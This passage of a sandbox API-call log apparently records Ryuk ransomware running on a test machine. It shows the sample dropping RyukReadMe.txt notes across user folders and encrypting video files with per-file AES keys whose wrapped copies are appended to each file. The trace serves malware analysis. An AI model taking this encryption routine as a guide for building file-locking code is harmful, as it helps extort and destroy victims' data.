dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.441] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.441] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0 [0158.441] FindClose (in: hFindFile=0x3a2dc0 | out: hFindFile=0x3a2dc0) returned 1 [0158.441] SetLastError (dwErrCode=0x0) [0158.441] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.442] GetLastError () returned 0x0 [0158.442] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.443] CloseHandle (hObject=0x184) returned 1 [0158.443] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.443] SetLastError (dwErrCode=0x0) [0158.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.443] GetLastError () returned 0xb7 [0158.443] CloseHandle (hObject=0x184) returned 1 [0158.443] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0158.443] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0158.443] SetLastError (dwErrCode=0x0) [0158.443] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.445] GetLastError () returned 0x0 [0158.445] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.446] CloseHandle (hObject=0x184) returned 1 [0158.446] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.446] SetLastError (dwErrCode=0x0) [0158.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.446] GetLastError () returned 0xb7 [0158.446] CloseHandle (hObject=0x184) returned 1 [0158.446] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0158.446] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0158.446] SetLastError (dwErrCode=0x0) [0158.446] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.450] GetLastError () returned 0x0 [0158.450] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.451] CloseHandle (hObject=0x184) returned 1 [0158.451] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.451] SetLastError (dwErrCode=0x0) [0158.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.451] GetLastError () returned 0xb7 [0158.451] CloseHandle (hObject=0x184) returned 1 [0158.451] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0xffffffffffffffff [0158.451] FindClose (in: hFindFile=0xffffffffffffffff | out: hFindFile=0xffffffffffffffff) returned 0 [0158.451] SetLastError (dwErrCode=0x0) [0158.451] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Templates\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\templates\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.452] GetLastError () returned 0x0 [0158.452] WriteFile (in: hFile=0x184, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad9a0, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29ad9a0*=0x320, lpOverlapped=0x0) returned 1 [0158.452] CloseHandle (hObject=0x184) returned 1 [0158.453] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ad9f0 | out: lpFindFileData=0x29ad9f0) returned 1 [0158.453] SetLastError (dwErrCode=0x0) [0158.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0158.453] GetLastError () returned 0xb7 [0158.453] CloseHandle (hObject=0x184) returned 1 [0158.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\*.*", lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 0x3a2dc0 [0158.453] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.453] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.453] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.453] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\65sosI5OrYPo.swf", dwFileAttributes=0x80) returned 1 [0158.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\65sosI5OrYPo.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\65sosi5orypo.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.454] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=90081) returned 1 [0158.454] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=90081) returned 1 [0158.454] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0x15ebf, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.454] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0158.454] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.454] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.454] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.454] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.455] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0x15fe1, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0x15fe1, lpOverlapped=0x0) returned 1 [0158.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.456] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x15fe1, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0x15ff0) returned 1 [0158.457] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.457] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15ff0, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0x15ff0, lpOverlapped=0x0) returned 1 [0158.457] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.457] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.457] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.457] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.457] CloseHandle (hObject=0x188) returned 1 [0158.471] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.475] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.475] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.476] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.476] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.476] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Cza9BI7Tq1x0AyY-Ld.mp4", dwFileAttributes=0x80) returned 1 [0158.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Cza9BI7Tq1x0AyY-Ld.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cza9bi7tq1x0ayy-ld.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.476] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acfe8 | out: lpFileSize=0x29acfe8*=54064) returned 1 [0158.476] GetFileSizeEx (in: hFile=0x188, lpFileSize=0x29acff8 | out: lpFileSize=0x29acff8*=54064) returned 1 [0158.476] SetFilePointerEx (in: hFile=0x188, liDistanceToMove=0xd20e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.476] ReadFile (in: hFile=0x188, lpBuffer=0x29ad048, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ad008, lpOverlapped=0x0 | out: lpBuffer=0x29ad048*, lpNumberOfBytesRead=0x29ad008*=0x19, lpOverlapped=0x0) returned 1 [0158.477] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.477] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29acfd0 | out: phKey=0x29acfd0*=0x3b8690) returned 1 [0158.477] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.477] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.477] ReadFile (in: hFile=0x188, lpBuffer=0x2760000, nNumberOfBytesToRead=0xd330, lpNumberOfBytesRead=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29acfe0*=0xd330, lpOverlapped=0x0) returned 1 [0158.478] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29acfdc*=0xf4250) returned 1 [0158.478] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd330, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29acfd8*=0xd340) returned 1 [0158.479] SetFilePointer (in: hFile=0x188, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.479] WriteFile (in: hFile=0x188, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xd340, lpNumberOfBytesWritten=0x29acfe0, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29acfe0*=0xd340, lpOverlapped=0x0) returned 1 [0158.479] WriteFile (in: hFile=0x188, lpBuffer=0x29ad020*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad020*, lpNumberOfBytesWritten=0x29acfe4*=0x6, lpOverlapped=0x0) returned 1 [0158.479] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29acff0 | out: pbData=0x0*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.479] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ad070, pdwDataLen=0x29acff0 | out: pbData=0x29ad070*, pdwDataLen=0x29acff0*=0x10c) returned 1 [0158.479] WriteFile (in: hFile=0x188, lpBuffer=0x29ad070*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29acfe4, lpOverlapped=0x0 | out: lpBuffer=0x29ad070*, lpNumberOfBytesWritten=0x29acfe4*=0x10c, lpOverlapped=0x0) returned 1 [0158.479] CloseHandle (hObject=0x188) returned 1 [0158.494] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.498] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.498] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.498] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.498] FindNextFileW (in: hFindFile=0x3a2dc0, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0158.498] SetLastError (dwErrCode=0x0) [0158.498] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0158.498] GetLastError () returned 0xb7 [0158.498] CloseHandle (hObject=0x188) returned 1 [0158.498] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2e20 [0158.498] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.498] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.498] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.499] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\1CcbwcfdqSYg1uM.avi", dwFileAttributes=0x80) returned 1 [0158.499] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\1CcbwcfdqSYg1uM.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\1ccbwcfdqsyg1um.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.499] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=82423) returned 1 [0158.499] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=82423) returned 1 [0158.499] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x140d5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.499] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.500] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.500] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.500] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.500] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.500] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x141f7, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x141f7, lpOverlapped=0x0) returned 1 [0158.501] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.501] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x141f7, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x14200) returned 1 [0158.502] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.502] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14200, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x14200, lpOverlapped=0x0) returned 1 [0158.502] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.502] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.502] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.502] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.502] CloseHandle (hObject=0x18c) returned 1 [0158.516] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.521] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.521] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.521] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.521] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.521] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\8JgO9S8CfsBC-x_.avi", dwFileAttributes=0x80) returned 1 [0158.521] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\8JgO9S8CfsBC-x_.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\8jgo9s8cfsbc-x_.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.522] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=99168) returned 1 [0158.522] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=99168) returned 1 [0158.522] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x1823e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.522] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.522] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.522] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.522] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.522] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.523] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x18360, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x18360, lpOverlapped=0x0) returned 1 [0158.524] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.524] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18360, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x18370) returned 1 [0158.525] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.525] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18370, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x18370, lpOverlapped=0x0) returned 1 [0158.525] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.525] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.525] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.525] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.525] CloseHandle (hObject=0x18c) returned 1 [0158.539] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.543] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.544] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.544] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.544] SetLastError (dwErrCode=0x0) [0158.544] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ryukreadme.txt"), 